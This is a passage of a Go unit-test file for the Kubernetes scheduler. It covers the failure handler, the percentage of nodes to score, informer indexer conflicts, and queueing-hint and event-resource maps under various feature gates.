if diff := cmp.Diff(tc.wantProfiles, profiles); diff != "" {
t.Errorf("unexpected profiles (-want, +got):\n%s", diff)
}
// Extenders
if len(tc.wantExtenders) != 0 {
// Scheduler.Extenders
extenders := make([]string, 0, len(s.Extenders))
for _, e := range s.Extenders {
extenders = append(extenders, e.Name())
}
if diff := cmp.Diff(tc.wantExtenders, extenders); diff != "" {
t.Errorf("unexpected extenders (-want, +got):\n%s", diff)
}
// fwk.Handle.Extenders()
for _, p := range s.Profiles {
extenders := make([]string, 0, len(p.Extenders()))
for _, e := range p.Extenders() {
extenders = append(extenders, e.Name())
}
if diff := cmp.Diff(tc.wantExtenders, extenders); diff != "" {
t.Errorf("unexpected extenders (-want, +got):\n%s", diff)
}
}
}
})
}
}
func TestFailureHandler(t *testing.T) {
metrics.Register()
testPod := st.MakePod().Name("test-pod").Namespace(v1.NamespaceDefault).Obj()
testPodUpdated := testPod.DeepCopy()
testPodUpdated.Labels = map[string]string{"foo": ""}
tests := []struct {
name string
podUpdatedDuringScheduling bool // pod is updated during a scheduling cycle
podDeletedDuringScheduling bool // pod is deleted during a scheduling cycle
expect *v1.Pod
}{
{
name: "pod is updated during a scheduling cycle",
podUpdatedDuringScheduling: true,
expect: testPodUpdated,
},
{
name: "pod is not updated during a scheduling cycle",
expect: testPod,
},
{
name: "pod is deleted during a scheduling cycle",
podDeletedDuringScheduling: true,
expect: nil,
},
}
for _, asyncAPICallsEnabled := range []bool{true, false} {
for _, tt := range tests {
t.Run(fmt.Sprintf("%s (Async API calls enabled: %v)", tt.name, asyncAPICallsEnabled), func(t *testing.T) {
logger, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
client := fake.NewClientset(&v1.PodList{Items: []v1.Pod{*testPod}})
informerFactory := informers.NewSharedInformerFactory(client, 0)
podInformer := informerFactory.Core().V1().Pods()
// Need to add/update/delete testPod to the store.
if err := podInformer.Informer().GetStore().Add(testPod); err != nil {
t.Fatal(err)
}
var apiDispatcher *apidispatcher.APIDispatcher
if asyncAPICallsEnabled {
apiDispatcher = apidispatcher.New(client, 16, apicalls.Relevances)
apiDispatcher.Run(logger)
defer apiDispatcher.Close()
}
recorder := metrics.NewMetricsAsyncRecorder(3, 20*time.Microsecond, ctx.Done())
queue := internalqueue.NewPriorityQueue(nil, informerFactory, internalqueue.WithClock(testingclock.NewFakeClock(time.Now())), internalqueue.WithMetricsRecorder(recorder), internalqueue.WithAPIDispatcher(apiDispatcher))
schedulerCache := internalcache.New(ctx, apiDispatcher)
queue.Add(logger, testPod)
if _, err := queue.Pop(logger); err != nil {
t.Fatalf("Pop failed: %v", err)
}
if tt.podUpdatedDuringScheduling {
if err := podInformer.Informer().GetStore().Update(testPodUpdated); err != nil {
t.Fatal(err)
}
queue.Update(logger, testPod, testPodUpdated)
}
if tt.podDeletedDuringScheduling {
if err := podInformer.Informer().GetStore().Delete(testPod); err != nil {
t.Fatal(err)
}
queue.Delete(testPod)
}
s, schedFramework, err := initScheduler(ctx, schedulerCache, queue, apiDispatcher, client, informerFactory)
if err != nil {
t.Fatal(err)
}
testPodInfo := &framework.QueuedPodInfo{PodInfo: mustNewPodInfo(t, testPod)}
s.FailureHandler(ctx, schedFramework, testPodInfo, fwk.NewStatus(fwk.Unschedulable), nil, time.Now())
var got *v1.Pod
if tt.podUpdatedDuringScheduling {
pInfo, ok := queue.GetPod(testPod.Name, testPod.Namespace)
if !ok {
t.Fatalf("Failed to get pod %s/%s from queue", testPod.Namespace, testPod.Name)
}
got = pInfo.Pod
} else {
got = getPodFromPriorityQueue(queue, testPod)
}
if diff := cmp.Diff(tt.expect, got); diff != "" {
t.Errorf("Unexpected pod (-want, +got): %s", diff)
}
})
}
}
}
func TestFailureHandler_PodAlreadyBound(t *testing.T) {
for _, asyncAPICallsEnabled := range []bool{true, false} {
t.Run(fmt.Sprintf("Async API calls enabled: %v", asyncAPICallsEnabled), func(t *testing.T) {
logger, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
nodeFoo := v1.Node{ObjectMeta: metav1.ObjectMeta{Name: "foo"}}
testPod := st.MakePod().Name("test-pod").Namespace(v1.NamespaceDefault).Node("foo").Obj()
client := fake.NewClientset(&v1.PodList{Items: []v1.Pod{*testPod}}, &v1.NodeList{Items: []v1.Node{nodeFoo}})
informerFactory := informers.NewSharedInformerFactory(client, 0)
podInformer := informerFactory.Core().V1().Pods()
// Need to add testPod to the store.
if err := podInformer.Informer().GetStore().Add(testPod); err != nil {
t.Fatal(err)
}
var apiDispatcher *apidispatcher.APIDispatcher
if asyncAPICallsEnabled {
apiDispatcher = apidispatcher.New(client, 16, apicalls.Relevances)
apiDispatcher.Run(logger)
defer apiDispatcher.Close()
}
queue := internalqueue.NewPriorityQueue(nil, informerFactory, internalqueue.WithClock(testingclock.NewFakeClock(time.Now())), internalqueue.WithAPIDispatcher(apiDispatcher))
schedulerCache := internalcache.New(ctx, apiDispatcher)
// Add node to schedulerCache no matter it's deleted in API server or not.
schedulerCache.AddNode(logger, &nodeFoo)
s, schedFramework, err := initScheduler(ctx, schedulerCache, queue, apiDispatcher, client, informerFactory)
if err != nil {
t.Fatal(err)
}
testPodInfo := &framework.QueuedPodInfo{PodInfo: mustNewPodInfo(t, testPod)}
s.FailureHandler(ctx, schedFramework, testPodInfo, fwk.NewStatus(fwk.Unschedulable).WithError(fmt.Errorf("binding rejected: timeout")), nil, time.Now())
pod := getPodFromPriorityQueue(queue, testPod)
if pod != nil {
t.Fatalf("Unexpected pod: %v should not be in PriorityQueue when the NodeName of pod is not empty", pod.Name)
}
})
}
}
// TestWithPercentageOfNodesToScore tests scheduler's PercentageOfNodesToScore is set correctly.
func TestWithPercentageOfNodesToScore(t *testing.T) {
tests := []struct {
name string
percentageOfNodesToScoreConfig *int32
wantedPercentageOfNodesToScore int32
}{
{
name: "percentageOfNodesScore is nil",
percentageOfNodesToScoreConfig: nil,
wantedPercentageOfNodesToScore: schedulerapi.DefaultPercentageOfNodesToScore,
},
{
name: "percentageOfNodesScore is not nil",
percentageOfNodesToScoreConfig: ptr.To[int32](10),
wantedPercentageOfNodesToScore: 10,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
client := fake.NewClientset()
informerFactory := informers.NewSharedInformerFactory(client, 0)
eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: client.EventsV1()})
_, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
sched, err := New(
ctx,
client,
informerFactory,
nil,
profile.NewRecorderFactory(eventBroadcaster),
WithPercentageOfNodesToScore(tt.percentageOfNodesToScoreConfig),
)
if err != nil {
t.Fatalf("Failed to create scheduler: %v", err)
}
if sched.percentageOfNodesToScore != tt.wantedPercentageOfNodesToScore {
t.Errorf("scheduler.percercentageOfNodesToScore = %v, want %v", sched.percentageOfNodesToScore, tt.wantedPercentageOfNodesToScore)
}
})
}
}
// getPodFromPriorityQueue is the function used in the TestDefaultErrorFunc test to get
// the specific pod from the given priority queue. It returns the found pod in the priority queue.
func getPodFromPriorityQueue(queue *internalqueue.PriorityQueue, pod *v1.Pod) *v1.Pod {
podList, _ := queue.PendingPods()
if len(podList) == 0 {
return nil
}
queryPodKey, err := cache.MetaNamespaceKeyFunc(pod)
if err != nil {
return nil
}
for _, foundPod := range podList {
foundPodKey, err := cache.MetaNamespaceKeyFunc(foundPod)
if err != nil {
return nil
}
if foundPodKey == queryPodKey {
return foundPod
}
}
return nil
}
func initScheduler(ctx context.Context, cache internalcache.Cache, queue internalqueue.SchedulingQueue, apiDispatcher *apidispatcher.APIDispatcher,
client kubernetes.Interface, informerFactory informers.SharedInformerFactory) (*Scheduler, framework.Framework, error) {
logger := klog.FromContext(ctx)
registerPluginFuncs := []tf.RegisterPluginFunc{
tf.RegisterQueueSortPlugin(queuesort.Name, queuesort.New),
tf.RegisterBindPlugin(defaultbinder.Name, defaultbinder.New),
}
eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: client.EventsV1()})
waitingPods := frameworkruntime.NewWaitingPodsMap()
fwk, err := tf.NewFramework(ctx,
registerPluginFuncs,
testSchedulerName,
frameworkruntime.WithClientSet(client),
frameworkruntime.WithAPIDispatcher(apiDispatcher),
frameworkruntime.WithInformerFactory(informerFactory),
frameworkruntime.WithEventRecorder(eventBroadcaster.NewRecorder(scheme.Scheme, testSchedulerName)),
frameworkruntime.WithWaitingPods(waitingPods),
)
if err != nil {
return nil, nil, err
}
if apiDispatcher != nil {
fwk.SetAPICacher(apicache.New(queue, cache))
}
s := &Scheduler{
Cache: cache,
client: client,
StopEverything: ctx.Done(),
SchedulingQueue: queue,
APIDispatcher: apiDispatcher,
Profiles: profile.Map{testSchedulerName: fwk},
logger: logger,
}
s.applyDefaultHandlers()
return s, fwk, nil
}
func TestInitPluginsWithIndexers(t *testing.T) {
tests := []struct {
name string
// the plugin registration ordering must not matter, being map traversal random
entrypoints map[string]frameworkruntime.PluginFactory
wantErr string
}{
{
name: "register indexer, no conflicts",
entrypoints: map[string]frameworkruntime.PluginFactory{
"AddIndexer": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
podInformer := handle.SharedInformerFactory().Core().V1().Pods()
err := podInformer.Informer().AddIndexers(cache.Indexers{
"nodeName": indexByPodSpecNodeName,
})
return &TestPlugin{name: "AddIndexer"}, err
},
},
},
{
name: "register the same indexer name multiple times, conflict",
// order of registration doesn't matter
entrypoints: map[string]frameworkruntime.PluginFactory{
"AddIndexer1": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
podInformer := handle.SharedInformerFactory().Core().V1().Pods()
err := podInformer.Informer().AddIndexers(cache.Indexers{
"nodeName": indexByPodSpecNodeName,
})
return &TestPlugin{name: "AddIndexer1"}, err
},
"AddIndexer2": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
podInformer := handle.SharedInformerFactory().Core().V1().Pods()
err := podInformer.Informer().AddIndexers(cache.Indexers{
"nodeName": indexByPodAnnotationNodeName,
})
return &TestPlugin{name: "AddIndexer1"}, err
},
},
wantErr: "indexer conflict",
},
{
name: "register the same indexer body with different names, no conflicts",
// order of registration doesn't matter
entrypoints: map[string]frameworkruntime.PluginFactory{
"AddIndexer1": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
podInformer := handle.SharedInformerFactory().Core().V1().Pods()
err := podInformer.Informer().AddIndexers(cache.Indexers{
"nodeName1": indexByPodSpecNodeName,
})
return &TestPlugin{name: "AddIndexer1"}, err
},
"AddIndexer2": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
podInformer := handle.SharedInformerFactory().Core().V1().Pods()
err := podInformer.Informer().AddIndexers(cache.Indexers{
"nodeName2": indexByPodAnnotationNodeName,
})
return &TestPlugin{name: "AddIndexer2"}, err
},
},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
fakeInformerFactory := NewInformerFactory(&fake.Clientset{}, 0*time.Second)
var registerPluginFuncs []tf.RegisterPluginFunc
for name, entrypoint := range tt.entrypoints {
registerPluginFuncs = append(registerPluginFuncs,
// anything supported by TestPlugin is fine
tf.RegisterFilterPlugin(name, entrypoint),
)
}
// we always need this
registerPluginFuncs = append(registerPluginFuncs,
tf.RegisterQueueSortPlugin(queuesort.Name, queuesort.New),
tf.RegisterBindPlugin(defaultbinder.Name, defaultbinder.New),
)
_, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
_, err := tf.NewFramework(ctx, registerPluginFuncs, "test", frameworkruntime.WithInformerFactory(fakeInformerFactory))
if len(tt.wantErr) > 0 {
if err == nil || !strings.Contains(err.Error(), tt.wantErr) {
t.Errorf("got error %q, want %q", err, tt.wantErr)
}
return
}
if err != nil {
t.Fatalf("Failed to create scheduler: %v", err)
}
})
}
}
func indexByPodSpecNodeName(obj interface{}) ([]string, error) {
pod, ok := obj.(*v1.Pod)
if !ok {
return []string{}, nil
}
if len(pod.Spec.NodeName) == 0 {
return []string{}, nil
}
return []string{pod.Spec.NodeName}, nil
}
func indexByPodAnnotationNodeName(obj interface{}) ([]string, error) {
pod, ok := obj.(*v1.Pod)
if !ok {
return []string{}, nil
}
if len(pod.Annotations) == 0 {
return []string{}, nil
}
nodeName, ok := pod.Annotations["node-name"]
if !ok {
return []string{}, nil
}
return []string{nodeName}, nil
}
const (
filterWithoutEnqueueExtensions = "filterWithoutEnqueueExtensions"
fakeNode = "fakeNode"
fakePod = "fakePod"
emptyEventsToRegister = "emptyEventsToRegister"
errorEventsToRegister = "errorEventsToRegister"
queueSort = "no-op-queue-sort-plugin"
fakeBind = "bind-plugin"
emptyEventExtensions = "emptyEventExtensions"
fakePermit = "fakePermit"
)
func Test_buildQueueingHintMap(t *testing.T) {
tests := []struct {
name string
plugins []fwk.Plugin
want map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction
featuregateDisabled bool
wantErr error
}{
{
name: "filter without EnqueueExtensions plugin",
plugins: []fwk.Plugin{&filterWithoutEnqueueExtensionsPlugin{}},
want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
{Resource: fwk.Pod, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.Node, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.CSINode, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.CSIDriver, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.CSIStorageCapacity, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.PersistentVolume, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.StorageClass, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.PersistentVolumeClaim, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.ResourceClaim, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.DeviceClass, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
{Resource: fwk.Workload, ActionType: fwk.All}: {
{PluginName: filterWithoutEnqueueExtensions, QueueingHintFn: defaultQueueingHintFn},
},
},
},
{
name: "node and pod plugin",
plugins: []fwk.Plugin{&fakeNodePlugin{}, &fakePodPlugin{}},
want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
{Resource: fwk.Pod, ActionType: fwk.Add}: {
{PluginName: fakePod, QueueingHintFn: fakePodPluginQueueingFn},
},
{Resource: fwk.Node, ActionType: fwk.Add}: {
{PluginName: fakeNode, QueueingHintFn: fakeNodePluginQueueingFn},
},
{Resource: fwk.Node, ActionType: fwk.UpdateNodeTaint}: {
{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
},
{
name: "node and pod plugin (featuregate is disabled)",
plugins: []fwk.Plugin{&fakeNodePlugin{}, &fakePodPlugin{}},
featuregateDisabled: true,
want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
{Resource: fwk.Pod, ActionType: fwk.Add}: {
{PluginName: fakePod, QueueingHintFn: defaultQueueingHintFn}, // default queueing hint due to disabled feature gate.
},
{Resource: fwk.Node, ActionType: fwk.Add}: {
{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // default queueing hint due to disabled feature gate.
},
{Resource: fwk.Node, ActionType: fwk.UpdateNodeTaint}: {
{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
},
{
name: "register plugin with empty event",
plugins: []fwk.Plugin{&emptyEventPlugin{}},
want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{},
},
{
name: "register plugins including emptyEventPlugin",
plugins: []fwk.Plugin{&emptyEventPlugin{}, &fakeNodePlugin{}},
want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{
{Resource: fwk.Pod, ActionType: fwk.Add}: {
{PluginName: fakePod, QueueingHintFn: fakePodPluginQueueingFn},
},
{Resource: fwk.Node, ActionType: fwk.Add}: {
{PluginName: fakeNode, QueueingHintFn: fakeNodePluginQueueingFn},
},
{Resource: fwk.Node, ActionType: fwk.UpdateNodeTaint}: {
{PluginName: fakeNode, QueueingHintFn: defaultQueueingHintFn}, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
},
{
name: "one EventsToRegister returns an error",
plugins: []fwk.Plugin{&errorEventsToRegisterPlugin{}},
want: map[fwk.ClusterEvent][]*internalqueue.QueueingHintFunction{},
wantErr: errors.New("mock error"),
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if tt.featuregateDisabled {
featuregatetesting.SetFeatureGateEmulationVersionDuringTest(t, feature.DefaultFeatureGate, version.MustParse("1.33"))
featuregatetesting.SetFeatureGateDuringTest(t, feature.DefaultFeatureGate, features.SchedulerQueueingHints, false)
}
logger, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
registry := frameworkruntime.Registry{}
cfgPls := &schedulerapi.Plugins{}
plugins := append(tt.plugins, &fakebindPlugin{}, &fakeQueueSortPlugin{})
for _, pl := range plugins {
tmpPl := pl
if err := registry.Register(pl.Name(), func(_ context.Context, _ runtime.Object, _ fwk.Handle) (fwk.Plugin, error) {
return tmpPl, nil
}); err != nil {
t.Fatalf("fail to register filter plugin (%s)", pl.Name())
}
cfgPls.MultiPoint.Enabled = append(cfgPls.MultiPoint.Enabled, schedulerapi.Plugin{Name: pl.Name()})
}
profile := schedulerapi.KubeSchedulerProfile{Plugins: cfgPls}
fwk, err := newFramework(ctx, registry, profile)
if err != nil {
t.Fatal(err)
}
exts := fwk.EnqueueExtensions()
// need to sort to make the test result stable.
sort.Slice(exts, func(i, j int) bool {
return exts[i].Name() < exts[j].Name()
})
got, err := buildQueueingHintMap(ctx, exts)
if err != nil {
if tt.wantErr != nil && tt.wantErr.Error() != err.Error() {
t.Fatalf("unexpected error from buildQueueingHintMap: expected: %v, actual: %v", tt.wantErr, err)
}
if tt.wantErr == nil {
t.Fatalf("unexpected error from buildQueueingHintMap: %v", err)
}
}
for e, fns := range got {
wantfns, ok := tt.want[e]
if !ok {
t.Errorf("got unexpected event %v", e)
continue
}
if len(fns) != len(wantfns) {
t.Errorf("got %v queueing hint functions, want %v", len(fns), len(wantfns))
continue
}
for i, fn := range fns {
if fn.PluginName != wantfns[i].PluginName {
t.Errorf("got plugin name %v, want %v", fn.PluginName, wantfns[i].PluginName)
continue
}
got, gotErr := fn.QueueingHintFn(logger, nil, nil, nil)
want, wantErr := wantfns[i].QueueingHintFn(logger, nil, nil, nil)
if got != want || gotErr != wantErr {
t.Errorf("got queueing hint function (%v) returning (%v, %v), expect it to return (%v, %v)", fn.PluginName, got, gotErr, want, wantErr)
continue
}
}
}
})
}
}
// Test_UnionedGVKs tests UnionedGVKs worked with buildQueueingHintMap.
func Test_UnionedGVKs(t *testing.T) {
tests := []struct {
name string
plugins schedulerapi.PluginSet
want map[fwk.EventResource]fwk.ActionType
enableInPlacePodVerticalScaling bool
enableSchedulerQueueingHints bool
enableDynamicResourceAllocation bool
enableNodeDeclaredFeatures bool
enableGangScheduling bool
}{
{
name: "filter without EnqueueExtensions plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: filterWithoutEnqueueExtensions},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.All,
fwk.Node: fwk.All,
fwk.CSINode: fwk.All,
fwk.CSIDriver: fwk.All,
fwk.CSIStorageCapacity: fwk.All,
fwk.PersistentVolume: fwk.All,
fwk.PersistentVolumeClaim: fwk.All,
fwk.StorageClass: fwk.All,
fwk.ResourceClaim: fwk.All,
fwk.DeviceClass: fwk.All,
},
},
{
name: "filter without EnqueueExtensions plugin (GenericWorkload enabled)",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: filterWithoutEnqueueExtensions},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.All,
fwk.Node: fwk.All,
fwk.CSINode: fwk.All,
fwk.CSIDriver: fwk.All,
fwk.CSIStorageCapacity: fwk.All,
fwk.PersistentVolume: fwk.All,
fwk.PersistentVolumeClaim: fwk.All,
fwk.StorageClass: fwk.All,
fwk.ResourceClaim: fwk.All,
fwk.DeviceClass: fwk.All,
fwk.Workload: fwk.All,
},
enableGangScheduling: true,
enableInPlacePodVerticalScaling: true,
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
},
{
name: "node plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: fakeNode},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Node: fwk.Add | fwk.UpdateNodeTaint, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
{
name: "pod plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: fakePod},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add,
},
},
{
name: "node and pod plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: fakePod},
{Name: fakeNode},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add,
fwk.Node: fwk.Add | fwk.UpdateNodeTaint, // When Node/Add is registered, Node/UpdateNodeTaint is automatically registered.
},
},
{
name: "empty EventsToRegister plugin",
plugins: schedulerapi.PluginSet{
Enabled: []schedulerapi.Plugin{
{Name: emptyEventsToRegister},
{Name: queueSort},
{Name: fakeBind},
},
Disabled: []schedulerapi.Plugin{{Name: "*"}}, // disable default plugins
},
want: map[fwk.EventResource]fwk.ActionType{},
},
{
name: "plugins with default profile (No feature gate enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
},
},
{
name: "plugins with default profile (InPlacePodVerticalScaling: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodScaleDown | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
},
enableInPlacePodVerticalScaling: true,
},
{
name: "plugins with default profile (queueingHint/InPlacePodVerticalScaling: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodScaleDown | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
},
enableInPlacePodVerticalScaling: true,
enableSchedulerQueueingHints: true,
},
{
name: "plugins with default profile (DynamicResourceAllocation: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodGeneratedResourceClaim | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
},
enableDynamicResourceAllocation: true,
},
{
name: "plugins with default profile (queueingHint/DynamicResourceAllocation: enabled)",
plugins: schedulerapi.PluginSet{Enabled: defaults.PluginsV1.MultiPoint.Enabled},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodGeneratedResourceClaim | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete,
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
},
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
},
{
name: "plugins with default profile and NodeDeclaredFeatures",
plugins: schedulerapi.PluginSet{Enabled: append(defaults.PluginsV1.MultiPoint.Enabled, schedulerapi.Plugin{Name: names.NodeDeclaredFeatures})},
want: map[fwk.EventResource]fwk.ActionType{
// NodeDeclaredFeatures adds fwk.Update
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodGeneratedResourceClaim | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete | fwk.Update,
// NodeDeclaredFeatures adds fwk.UpdateNodeDeclaredFeature
fwk.Node: fwk.Add | fwk.UpdateNodeAllocatable | fwk.UpdateNodeLabel | fwk.UpdateNodeTaint | fwk.Delete | fwk.UpdateNodeDeclaredFeature,
fwk.CSINode: fwk.All - fwk.Delete,
fwk.CSIDriver: fwk.Update,
fwk.CSIStorageCapacity: fwk.All - fwk.Delete,
fwk.PersistentVolume: fwk.All - fwk.Delete,
fwk.PersistentVolumeClaim: fwk.All - fwk.Delete,
fwk.StorageClass: fwk.All - fwk.Delete,
fwk.VolumeAttachment: fwk.Delete,
fwk.DeviceClass: fwk.All - fwk.Delete,
fwk.ResourceClaim: fwk.All - fwk.Delete,
fwk.ResourceSlice: fwk.All - fwk.Delete,
},
enableDynamicResourceAllocation: true,
enableSchedulerQueueingHints: true,
enableNodeDeclaredFeatures: true,
enableInPlacePodVerticalScaling: true,
},
{
name: "plugins with default profile and GangScheduling",
plugins: schedulerapi.PluginSet{Enabled: append(defaults.PluginsV1.MultiPoint.Enabled, schedulerapi.Plugin{Name: names.GangScheduling})},
want: map[fwk.EventResource]fwk.ActionType{
fwk.Pod: fwk.Add | fwk.UpdatePodLabel | fwk.UpdatePodScaleDown | fwk.UpdatePodGeneratedResourceClaim | fwk.UpdatePodToleration | fwk.UpdatePodSchedulingGatesEliminated | fwk.Delete,
